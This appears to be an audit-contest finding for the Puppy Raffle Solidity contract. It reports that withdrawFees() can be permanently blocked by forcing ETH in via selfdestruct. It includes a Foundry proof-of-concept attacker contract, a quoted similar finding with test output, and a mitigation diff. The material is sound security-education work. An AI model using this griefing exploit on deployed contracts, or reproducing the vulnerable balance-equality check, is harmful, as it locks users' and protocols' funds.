Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: medium
Valid

Self-Destruct Attack Permanently Locks Protocol Fees

Scope: src/PuppyRaffle.sol

Root + Impact

The withdrawFees() function requires address(this).balance == uint256(totalFees). An attacker can force ETH into the contract via selfdestruct(), making this equality check always fail and permanently locking all fees.

Description

  • Normal behavior: After a raffle completes and there are no active players, the owner should be able to withdraw accumulated fees.

  • The issue: Solidity allows forcing ETH into contracts via selfdestruct() without triggering receive() or fallback(). This breaks the strict equality check, permanently blocking fee withdrawals.

function withdrawFees() external {
// @> Strict equality can be broken by forcefully sending ETH
require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!");
uint256 feesToWithdraw = totalFees;
totalFees = 0;
(bool success,) = feeAddress.call{value: feesToWithdraw}("");
require(success, "PuppyRaffle: Failed to withdraw fees");
}

Risk

Likelihood:

  • Any user executes the attack for minimal cost (1 wei + gas)

  • Attack is irreversible once executed

  • No special permissions or timing required

Impact:

  • All accumulated fees are permanently locked

  • Protocol cannot collect revenue

  • Contract must be redeployed, losing all state

Proof of Concept

Explanation: The test completes a raffle to accumulate fees, then uses selfdestruct to force 1 wei into the contract. After this, balance != totalFees, so withdrawFees() always reverts with "There are currently players active!" even when no players exist.

contract SelfDestructAttacker {
constructor(address target) payable {
selfdestruct(payable(target));
}
}
function testVuln5_WithdrawFeesGriefing() public {
address[] memory players = new address[](4);
players[0] = playerOne;
players[1] = playerTwo;
players[2] = playerThree;
players[3] = playerFour;
puppyRaffle.enterRaffle{value: entranceFee * 4}(players);
vm.warp(block.timestamp + duration + 1);
puppyRaffle.selectWinner();
// Fees exist and balance equals totalFees
uint256 fees = uint256(puppyRaffle.totalFees());
assertEq(address(puppyRaffle).balance, fees);
// Attack: force 1 wei into contract via selfdestruct
vm.deal(address(this), 1 wei);
new SelfDestructAttacker{value: 1 wei}(address(puppyRaffle));
// Now balance != totalFees, withdrawal permanently blocked
assertTrue(address(puppyRaffle).balance != uint256(puppyRaffle.totalFees()));
vm.expectRevert("PuppyRaffle: There are currently players active!");
puppyRaffle.withdrawFees();
}

Recommended Mitigation

Explanation: Replace the balance equality check with a check for active players. This cannot be manipulated by forcing ETH into the contract.

function withdrawFees() external {
- require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!");
+ require(players.length == 0, "PuppyRaffle: There are currently players active!");
uint256 feesToWithdraw = totalFees;
totalFees = 0;
(bool success,) = feeAddress.call{value: feesToWithdraw}("");
require(success, "PuppyRaffle: Failed to withdraw fees");
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-02] Slightly increasing puppyraffle's contract balance will render `withdrawFees` function useless

## Description An attacker can slightly change the eth balance of the contract to break the `withdrawFees` function. ## Vulnerability Details The withdraw function contains the following check: ``` require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); ``` Using `address(this).balance` in this way invites attackers to modify said balance in order to make this check fail. This can be easily done as follows: Add this contract above `PuppyRaffleTest`: ``` contract Kill { constructor (address target) payable { address payable _target = payable(target); selfdestruct(_target); } } ``` Modify `setUp` as follows: ``` function setUp() public { puppyRaffle = new PuppyRaffle( entranceFee, feeAddress, duration ); address mAlice = makeAddr("mAlice"); vm.deal(mAlice, 1 ether); vm.startPrank(mAlice); Kill kill = new Kill{value: 0.01 ether}(address(puppyRaffle)); vm.stopPrank(); } ``` Now run `testWithdrawFees()` - ` forge test --mt testWithdrawFees` to get: ``` Running 1 test for test/PuppyRaffleTest.t.sol:PuppyRaffleTest [FAIL. Reason: PuppyRaffle: There are currently players active!] testWithdrawFees() (gas: 361718) Test result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 3.40ms ``` Any small amount sent over by a self destructing contract will make `withdrawFees` function unusable, leaving no other way of taking the fees out of the contract. ## Impact All fees that weren't withdrawn and all future fees are stuck in the contract. ## Recommendations Avoid using `address(this).balance` in this way as it can easily be changed by an attacker. Properly track the `totalFees` and withdraw it. ```diff function withdrawFees() external { -- require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); uint256 feesToWithdraw = totalFees; totalFees = 0; (bool success,) = feeAddress.call{value: feesToWithdraw}(""); require(success, "PuppyRaffle: Failed to withdraw fees"); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!